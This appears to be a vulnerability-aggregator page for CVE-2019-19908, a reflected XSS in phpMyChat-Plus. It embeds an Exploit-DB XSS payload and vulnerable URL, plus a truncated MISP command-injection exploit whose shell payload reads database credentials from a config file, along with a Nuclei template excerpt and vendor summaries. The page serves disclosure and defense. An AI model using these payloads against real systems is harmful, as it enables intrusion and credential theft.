CVE-2019-19908
published 2019-12-20CVE-2019-19908: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to…
PriorityP348medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
21.23%
97.3th percentile
phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ciprianmp | phpmychat-plus | — | — |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
exploitdb·2019-12-20·CVSS 6.1
CVE-2019-19908 [MEDIUM] phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
---
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908
Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
Payload:
">alert('xss')
Vulnerable URL:
http://localhost/plus/pass_reset.php?L=english&pmc_username=">alert('xss')
Exploit-DB
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
exploitdb·2019-02-18·CVSS 8.8
CVE-2018-19908 [HIGH] MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
---
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
from base64 import b64encode
from urllib.parse import quote_plus
b64Data = b64encode(data.encode("utf-8"))
urlEncode = quote_plus(b64Data)
return urlEncode
def generate_payload(SQLRequest):
payload = 'MISPPath="../../";'\
'MISPPDB="$MISPPath/app/Config/database.php";'\
'MySQLUUser=$(grep -o -P "(? \').*(?=\')" $MISPPDB);'\
'MySQLRUser=
Nuclei
phpMyChat-Plus 1.98 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-19908 [MEDIUM] phpMyChat-Plus 1.98 - Cross-Site Scripting
phpMyChat-Plus 1.98 - Cross-Site Scripting
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
Template:
id: CVE-2019-19908
info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitig
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Wiz
CVE-2020-37151 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2020-37151 [MEDIUM] CVE-2020-37151 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37151 :
phpMyChat Plus vulnerability analysis and mitigation
phpMyChat Plus 1.98 contains a SQL injection vulnerability in the deluser.php page through the pmc_username parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, and time-based blind SQL injection techniques to extract sensitive database information by crafting malicious payloads in the username field.
Source : NVD
## 8.8
Score
Published February 5, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
phpMyChat Plus
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe:2.3:a:cipria
2019-12-20
Published